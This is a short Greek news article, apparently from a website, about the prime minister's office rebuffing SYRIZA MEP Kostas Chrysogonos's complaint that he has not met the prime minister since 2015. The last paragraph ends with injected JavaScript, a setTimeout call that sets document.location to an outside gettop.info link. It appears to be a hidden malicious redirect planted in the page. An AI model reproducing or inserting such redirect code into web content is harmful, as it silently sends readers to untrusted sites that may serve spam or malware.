Μαξίμου προς Χρυσόγονο: Ο πρωθυπουργός δεν επιλέγει τους συνομιλητές του από τα πάνελ των τηλεοπτικών σταθμών

0
7

 

«Ο πρωθυπουργός δεν επιλέγει τους συνομιλητές του από τα πάνελ των τηλεοπτικών σταθμών» ήταν το σχόλιο κυβερνητικών κύκλων ως απάντηση στον ευρωβουλευτή του ΣΥΡΙΖΑ, Κώστα Χρυσόγονο, για τις δηλώσεις του σε ραδιοφωνική συνέντευξη ότι ο πρωθυπουργός επιλέγει άλλους για να ενημερωθεί.

Σε συνέντευξή του στον ΣΚΑΪ, ο κ. Χρυσόγονος σημείωσε, μεταξύ άλλων: «Δυο χρόνια έχω να δω τον πρωθυπουργό, από τον Μάρτιο του 2015ν που συναντηθήκαμε με την ευρωομάδα του ΣΥΡΙΖΑ. Ούτε κατ’ ίδιαν τον έχω δει. Ππροφανώς ενημερώνεται (σ.σ. ο πρωθυπουργός) για τα ευρωπαϊκά θέματα από τον κ. Καρανίκα, την κ. Νοτοπούλου και το άλλο επιτελείο του Μαξίμου».

Σε ερώτηση αν πιστεύει πως ενοχλεί με αυτά που κατά καιρούς αναφέρει, απάντησε: «Αυτό που πιστεύω το λέω, δεν κρύβομαι. Από ‘και και πέρα, σε όποιον αρέσουμε, για τους άλλους δεν θα μπορέσουμε».

Ενοχλημένοι οι κύκλοι του Μαξίμου απαντούσαν λίγη ώρα μετά ότι ο πρωθυπουργός δεν επιλέγει τους συνομιλητές του από τα πάνελ των τηλεοπτικών σταθμών. Άλλωστε, αν ήθελε ο ευρωβουλευτής να συναντήσει τον πρωθυπουργό, θα μπορούσε να τον δει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here